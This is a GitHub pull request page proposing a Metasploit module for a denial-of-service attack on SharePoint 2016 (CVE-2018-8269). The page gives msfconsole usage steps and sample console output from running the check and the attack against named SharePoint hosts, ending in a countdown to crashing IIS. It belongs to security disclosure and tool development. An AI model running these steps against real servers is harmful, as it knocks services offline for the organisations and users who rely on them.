New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Microsoft SharePoint 2016 DOS - CVE-2018-8269 #11214

Open
wants to merge 6 commits into
base: master
from

Conversation

Projects
None yet
1 participant
@waveburst
Copy link

waveburst commented Jan 9, 2019

This is a DOS exploitation for Microsoft SharePoint 2016 Server according to a research done by Aleph Security Team by HCL technologies (CVE-2018-8269). More details can be found here:
https://alephsecurity.com/2018/10/22/StackOverflowException/

Verification

1.Start msfconsole
2.use auxiliary/dos/windows/http/sp16_dos
3.set VHOST victim.sharepoint.com and set RHOSTS victim.sharepoint.com
4. if needed by Server set USERNAME evil and set PASSWORD p@ssword
5. check checks if server is vulnerable and should not crush the server.
6. run - use with CATION. this will crush the IIS server when countdown reaches 1.

Scenarios

msf5 auxiliary(dos/windows/http/sp16_dos) > check

[*] 13.107.136.9:443 - Fetching Authentication Cookie
[*] 13.107.136.9:443 - Sending innocent request...
[+] 13.107.136.9:443 - Server responded 200 to innocent request
[*] 13.107.136.9:443 - Sending malicious request...
[+] 13.107.136.9:443 - The target is vulnerable.

----------------------------------
msf5 auxiliary(dos/windows/http/sp16_dos) > run

[*] hclo365.sharepoint.com:443 - Fetching Authentication Cookie
[*] hclo365.sharepoint.com:443 - Sending innocent request...
[+] hclo365.sharepoint.com:443 - Server responded 200 to innocent request
[*] hclo365.sharepoint.com:443 - Sending malicious request...
[*] hclo365.sharepoint.com:443 - Sending DOS malicious requests...
[*] hclo365.sharepoint.com:443 - Countdown 10...
[*] hclo365.sharepoint.com:443 - Countdown 9...
[*] hclo365.sharepoint.com:443 - Countdown 8...
....
[*] hclo365.sharepoint.com:443 - Countdown 1...

@waveburst waveburst closed this Jan 9, 2019

@waveburst

This comment has been minimized.

Copy link

waveburst commented Jan 9, 2019

Pausing pull request to revisit exploit operation.

wave added some commits Jan 17, 2019

wave
SITES options added - In some cases malicious request need to target
avaliable site. This options might be self set by 'get_available_site'
@waveburst

This comment has been minimized.

Copy link

waveburst commented Jan 20, 2019

Exploit now support authenticated attack as well as unauthenticated attack (for public servers).
Also if needed the exploit tries to search for available site to execute a success attack.

@waveburst waveburst reopened this Jan 20, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment